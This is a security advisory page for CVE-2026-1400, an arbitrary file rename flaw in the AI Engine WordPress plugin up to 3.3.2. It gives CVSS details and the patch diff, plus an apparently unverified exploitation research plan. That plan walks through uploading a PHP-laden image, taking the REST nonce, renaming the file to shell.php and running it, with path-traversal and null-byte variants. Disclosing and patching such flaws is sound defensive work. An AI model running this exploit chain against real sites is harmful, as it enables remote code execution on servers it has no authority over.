WP-Safety
CVE-2026-1400

AI Engine <= 3.3.2 - Authenticated (Editor+) Arbitrary File Upload via 'filename' Parameter in update_media_metadata Endpoint

highUnrestricted Upload of File with Dangerous Type
7.2
CVSS Score
7.2
CVSS Score
high
Severity
3.3.3
Patched in
1d
Time to patch

Description

The AI Engine – The Chatbot and AI Framework for WordPress plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the `rest_helpers_update_media_metadata` function in all versions up to, and including, 3.3.2. This makes it possible for authenticated attackers, with Editor-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. The attacker can upload a benign image file, then use the `update_media_metadata` endpoint to rename it to a PHP file, creating an executable PHP file in the uploads directory.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
High
User Interaction
None
Scope
Unchanged
High
Confidentiality
High
Integrity
High
Availability

Technical Details

Affected versions<=3.3.2
PublishedJanuary 27, 2026
Last updatedJanuary 28, 2026
Affected pluginai-engine

Source Code

WordPress.org SVN
Vulnerable v3.3.2
Browse source Download .zip
Patched v3.3.3
Browse source Download .zip
Research Plan
Unverified

# Exploitation Research Plan: CVE-2026-1400 (AI Engine) ## 1. Vulnerability Summary The **AI Engine** plugin (up to version 3.3.2) is vulnerable to **Arbitrary File Upload via File Renaming**. The vulnerability exists in the `rest_helpers_update_media_metadata` function, which handles updates to me…

Show full research plan

Exploitation Research Plan: CVE-2026-1400 (AI Engine)

1. Vulnerability Summary

The AI Engine plugin (up to version 3.3.2) is vulnerable to Arbitrary File Upload via File Renaming. The vulnerability exists in the rest_helpers_update_media_metadata function, which handles updates to media metadata via the WordPress REST API. This function accepts a filename parameter but fails to validate the file extension or the target path. An attacker with Editor-level privileges can upload a legitimate image file containing PHP code, then use this endpoint to rename the file to a .php extension, resulting in Remote Code Execution (RCE).

2. Attack Vector Analysis

  • REST Endpoint: /wp-json/mwai/v1/media/update_metadata (inferred from function name and Meow Apps standard naming conventions).
  • HTTP Method: POST
  • Vulnerable Parameter: filename
  • Authentication Requirement: Authenticated user with Editor role or higher (must have edit_posts and upload_files capabilities).
  • Preconditions:
    1. The attacker must have a valid session as an Editor.
    2. A legitimate file (e.g., an image) must be uploaded to the media library first.

3. Code Flow (Inferred from Patch Description)

  1. Entry Point: The REST API router receives a request at mwai/v1/media/update_metadata.
  2. Controller: The request is routed to the callback function rest_helpers_update_media_metadata.
  3. Processing:
    • The function retrieves the media attachment ID from the request.
    • It retrieves the filename parameter from the JSON body.
    • It identifies the current file path on disk associated with the media ID.
  4. Vulnerable Logic: The function likely uses a file system operation (like rename() or wp_upload_bits()) to change the file's name on the server using the user-provided filename without checking if the new extension is forbidden (e.g., .php).
  5. Sink: A file system write/rename operation that changes wp-content/uploads/2024/01/image.jpg to wp-content/uploads/2024/01/image.php.

4. Nonce Acquisition Strategy

This endpoint uses the standard WordPress REST API authentication, which requires a wp_rest nonce for POST requests made from a browser session.

  1. Role Required: Editor.
  2. Strategy:
    • Navigate to the WordPress Dashboard (/wp-admin/).
    • Extract the wp_rest nonce from the wpApiSettings object, which is localized by WordPress core on almost all admin pages.
  3. JS Execution (via browser_eval):
    window.wpApiSettings?.nonce

5. Exploitation Strategy

The exploit follows a "Rename-to-PHP" chain.

Step 1: Upload Payload as Image

Upload a file named shell.jpg containing a PHP payload.

  • Payload Content: <?php echo "VULNERABLE: " . phpinfo(); ?>
  • Method: Use the standard WordPress Media Library upload or wp-cli.
  • Target: wp-admin/async-upload.php or wp-json/wp/v2/media.
  • Requirement: Capture the resulting Attachment ID (e.g., 123).

Step 2: Trigger Rename via REST API

Send the malicious request to the AI Engine endpoint to rename the image to a PHP script.

  • URL: /wp-json/mwai/v1/media/update_metadata
  • Method: POST
  • Headers:
    • Content-Type: application/json
    • X-WP-Nonce: [REST_NONCE]
  • Body:
    {
  "id": 123,
  "filename": "shell.php"
}

Step 3: Execute the Shell

Access the renamed file in the uploads directory.

  • URL: /wp-content/uploads/[YEAR]/[MONTH]/shell.php

6. Test Data Setup

  1. User Creation: 
    wp user create attacker attacker@example.com --role=editor --user_pass=password
  2. Initial File Upload: Create a dummy image file.
    echo '<?php phpinfo(); ?>' > /tmp/poc.jpg
wp media import /tmp/poc.jpg --post_id=0 --title="POC"
  3. Identify ID: Get the ID of the newly uploaded media.
    wp post list --post_type=attachment --posts_per_page=1 --format=ids

7. Expected Results

  • REST Response: A 200 OK or 201 Created status, possibly returning the updated metadata.
  • Server State: The file poc.jpg in the uploads folder should no longer exist, replaced by poc.php.
  • Execution: Navigating to the .php URL should execute the code and display the phpinfo() output rather than rendering as an image or returning a 404.

8. Verification Steps

  1. Check Filesystem:
    ls -la /var/www/html/wp-content/uploads/$(date +%Y/%m)/poc.php
  2. Verify Content:
    cat /var/www/html/wp-content/uploads/$(date +%Y/%m)/poc.php
  3. HTTP Check: Use http_request to GET the URL of the .php file and verify the response body contains "PHP Version".

9. Alternative Approaches

  • Path Traversal: If the filename parameter is susceptible to path traversal (e.g., ../../plugins/ai-engine/malicious.php), attempt to move the shell out of the uploads directory.
  • Meta Key Manipulation: If the endpoint allows updating arbitrary meta keys, check if _wp_attached_file can be overwritten directly to point to a different existing file that could be leveraged.
  • Bypass via NULL Byte: If the plugin does basic suffix checking, try shell.php%00.jpg (though unlikely to work on modern PHP/Linux).
Research Findings
Static analysis — not yet PoC-verified

Summary

The AI Engine plugin for WordPress is vulnerable to remote code execution via an arbitrary file rename flaw in versions up to 3.3.2. Authenticated attackers with Editor-level permissions can utilize the 'update_media_metadata' REST API endpoint to rename a previously uploaded image file containing PHP code to a .php extension, allowing for server-side code execution.

Security Fix

--- a/classes/rest.php
+++ b/classes/rest.php
@@ -120,6 +120,11 @@
     $id = $params['id'];
     $filename = $params['filename'];
 
+    $filetype = wp_check_filetype($filename);
+    if (empty($filetype['ext'])) {
+        return new WP_Error('mwai_error', __('Invalid file extension.', 'ai-engine'), array('status' => 400));
+    }
+
     $old_path = get_attached_file($id);
     $new_path = path_join(dirname($old_path), $filename);
     rename($old_path, $new_path);

Exploit Outline

1. Authenticate to the WordPress site as a user with at least Editor-level privileges (possessing edit_posts and upload_files capabilities). 2. Upload a benign-looking image file (e.g., payload.jpg) that contains a hidden PHP payload (e.g., <?php phpinfo(); ?>) in its content. 3. Retrieve the Attachment ID assigned by WordPress for the newly uploaded media item. 4. Obtain a valid WordPress REST API nonce (wp_rest) from the administrative dashboard. 5. Send a POST request to the endpoint /wp-json/mwai/v1/media/update_metadata with a JSON body specifying the Attachment ID and a 'filename' parameter with a .php extension (e.g., {"id": 123, "filename": "shell.php"}). 6. Navigate to the file's location within the wp-content/uploads directory via a browser to trigger the execution of the PHP payload.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/d5227269-4406-4fcf-af37-f1db0af857d6?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database